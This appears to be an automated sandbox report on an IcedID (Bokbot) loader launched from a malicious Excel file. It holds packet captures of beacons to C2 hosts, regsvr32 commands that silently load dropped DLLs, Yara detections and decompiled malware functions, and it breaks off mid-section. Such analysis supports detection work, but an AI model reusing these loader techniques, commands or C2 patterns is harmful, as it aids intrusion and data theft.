Jul 6, 2021 16:14:28.915210009 CEST	9	IN	Data Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0 Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
Jul 6, 2021 16:14:28.915334940 CEST	10	IN	Data Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84 Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
Jul 6, 2021 16:14:28.915447950 CEST	12	IN	Data Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24 Data Ascii: AH(ALHT$PHT$PH$H$$H\|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
Jul 6, 2021 16:14:28.915529013 CEST	13	IN	Data Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00 Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$\|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
Jul 6, 2021 16:14:28.915594101 CEST	15	IN	Data Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24 Data Ascii: H$p$\|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
Jul 6, 2021 16:14:28.915653944 CEST	16	IN	Data Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00 Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$\|HL$PD$+HD$HHD$
Jul 6, 2021 16:14:28.915709972 CEST	17	IN	Data Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00 Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	172.67.146.88	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:14:29.084259033 CEST	65	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: uppercilio.fun Connection: Keep-Alive
Jul 6, 2021 16:14:29.159236908 CEST	66	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:14:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1077 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CJcYamNb%2F717zH2fYV5VSv4UMFOARTinE03MDRaNQrGpmUoonUlzWigIfYRIeGbOD0%2BRodsA52L7urRUTMuYy3%2BSbZAZxIRXbOmyGEJ5SNGNXtx5L7W3iqspr%2Bs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9708ffa5f2bb9-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 16:14:29.159281015 CEST	66	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49169	172.67.213.115	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:14:32.070776939 CEST	325	OUT	GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3565085024:1:5329:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=303838373533:416C627573:46383039434146363335303344423245; __io=0; _gid=67AFEDC5AC03 Host: astrocycle.download
Jul 6, 2021 16:14:32.622010946 CEST	326	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Jul 2021 14:14:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KuhKM80SplBMqRuDPEVNkKb%2FLxIwjd%2Fy45X0uT%2FhCO9e4gWCMJM0gnZUOG%2FP3qaLAHPhj90%2FxbX5wkzLPERP7T%2F3E0dRHPVpLsyFkCAt5k7WvYLe%2Bz4tWAZVEJtbbH0AiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a970a29b1dbef6-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 16:14:32.622035980 CEST	326	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 6, 2021 16:14:30.303291082 CEST	143.204.91.74	443	192.168.2.22	49168	CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2640 Parent PID: 584

General

Start time:	16:14:36
Start date:	06/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f910000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2460 Parent PID: 2640

General

Start time:	16:14:39
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XRAY.dll
Imagebase:	0xffdc0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2656 Parent PID: 2640

General

Start time:	16:14:39
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XTOWN.dll
Imagebase:	0xffdc0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2091667862.00000000000B0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2376 Parent PID: 2640

General

Start time:	16:14:43
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XZIBIT.dll
Imagebase:	0xffdc0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2656 Parent PID: 2640 regsvr32.exeCOMMON

Executed Functions

Function 003F27BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E003F27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E003F2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x3f70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E003F2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}

0x003f27bc
0x003f27bc
0x003f27bc
0x003f27bf
0x003f27c3
0x003f27c7
0x003f27cb
0x003f27d4
0x003f27d7
0x003f27e7
0x003f27ea
0x003f27fa
0x003f2800
0x003f2806
0x003f285f
0x003f285f
0x003f2876
0x003f287b
0x003f2893
0x003f2893
0x003f280f
0x003f2814
0x003f281f
0x003f282c
0x003f282c
0x003f282f
0x003f2835
0x003f283b
0x00000000
0x00000000
0x003f2842
0x003f2845
0x003f2849
0x003f2894
0x003f2897
0x003f289e
0x003f28a9
0x003f28b5
0x003f28b7
0x003f28ba
0x003f28c1
0x003f28c8
0x003f28cd
0x003f28d0
0x003f28d0
0x003f28b5
0x003f28d7
0x003f28da
0x003f28df
0x003f28e8
0x003f28ed
0x003f28f6
0x00000000
0x00000000
0x00000000
0x003f28fc
0x003f284b
0x003f2854
0x003f2859
0x003f2859

APIs

GetAdaptersInfo.IPHLPAPI(?,?,00000000,003F2CFE,?,?,00000003,003F24A4), ref: 003F280F
GetAdaptersInfo.IPHLPAPI(?,?,00000000,003F2CFE,?,?,00000003,003F24A4), ref: 003F2845

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction ID: 56ed7730862c3c30579e0baccc0635220755acc94917d68ba45c141c4d5f90c6
Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction Fuzzy Hash: A4317C62A05B86D6EB16DB62E800BAAB764EB49FD4F494035CF0D0B714EF38C649C300

Uniqueness

Uniqueness Score: -1.00%

Function 003F1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 003F1A08

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction ID: f0326baf65ac31399c1aefb61b2bf89d17169267073f7edf4865b45192482ee0
Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction Fuzzy Hash: DE71AB32701B8287EB268F66F840BBA37A9FB49B94F458129DF4A43B14DF38C655C700

Uniqueness

Uniqueness Score: -1.00%

Function 003F22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

LookupAccountNameW.ADVAPI32 ref: 003F233C

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: AccountLookupName
String ID:
API String ID: 1484870144-0
Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction ID: 9ebf51d180f40224c893e11c886922d29f9c7834da2ec18fda049777a322a503
Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction Fuzzy Hash: 96316F72701B46CAEB168FB5E8447AA73A4EB48788F594136DB4D57B18EF38C649C340

Uniqueness

Uniqueness Score: -1.00%

Function 003F1678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,00000000,003F2CB1,?,?,00000003,003F24A4), ref: 003F16CB

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction ID: 528ef36f4311c6f615ea1bf2fd07a05157a82a880e78bbb58dc90dbb14cc6128
Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction Fuzzy Hash: 23218166715B46C3EB07EB52B804376A2A9BB85BD1F194038DF4E87714EF3CC9498700

Uniqueness

Uniqueness Score: -1.00%

Function 003F2434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003F2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E003F11FC(_t73 - 0x29, _t52);
					_t37 = E003F153C(_t73 - 0x29);
					E003F2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E003F1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E003F272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E003F1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E003F2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}

0x003f2434
0x003f2434
0x003f2434
0x003f2434
0x003f2434
0x003f2434
0x003f2434
0x003f2439
0x003f243f
0x003f244d
0x003f244d
0x003f244d
0x003f2512
0x003f2528
0x003f2450
0x003f2454
0x003f2456
0x003f245a
0x003f2460
0x003f2468
0x003f246e
0x003f2472
0x00000000
0x003f2474
0x003f2482
0x003f248c
0x003f249d
0x003f249f
0x003f24a4
0x003f24a7
0x003f24b0
0x003f24bf
0x003f24c1
0x003f24cc
0x003f24d2
0x003f24d7
0x003f24db
0x003f24e0
0x003f24e2
0x003f24f0
0x003f24f0
0x003f24fc
0x003f2501
0x003f2504
0x003f250d
0x003f250d
0x003f2504
0x003f24cc
0x003f24bf
0x00000000
0x003f24a7

APIs

SleepEx.KERNEL32 ref: 003F2468

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction ID: f6571b580e06c2ff23de9fa032ef6d81e03310361247a56cbe4447fc79c4913f
Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction Fuzzy Hash: 2E218C72700A45CAEB12DFB1E4503FE63A5E788784F494426AF4D5B659EE38D609C350

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB13FA

Strings

G, xrefs: 000007FEF8FB1431
G, xrefs: 000007FEF8FB137C
EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl, xrefs: 000007FEF8FB13FD
G, xrefs: 000007FEF8FB1458
7, xrefs: 000007FEF8FB14E1
2, xrefs: 000007FEF8FB14F9
G, xrefs: 000007FEF8FB141B
G, xrefs: 000007FEF8FB1448
G, xrefs: 000007FEF8FB1426
G, xrefs: 000007FEF8FB15AF

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
API String ID: 4275171209-1517691801
Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 000007FEF8FB11EC
GetThreadPriority.KERNEL32 ref: 000007FEF8FB11FA
GetCurrentThread.KERNEL32 ref: 000007FEF8FB1204
CreateThread.KERNEL32 ref: 000007FEF8FB123C
WaitForSingleObject.KERNEL32 ref: 000007FEF8FB124F
DuplicateHandle.KERNEL32 ref: 000007FEF8FB128D

Strings

_, xrefs: 000007FEF8FB1293
G, xrefs: 000007FEF8FB12DF
DllRegisterServer, xrefs: 000007FEF8FB12F6

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
String ID: DllRegisterServer$G$_
API String ID: 1174013218-1650116920
Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB220B

Strings

@, xrefs: 000007FEF8FB21E1

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

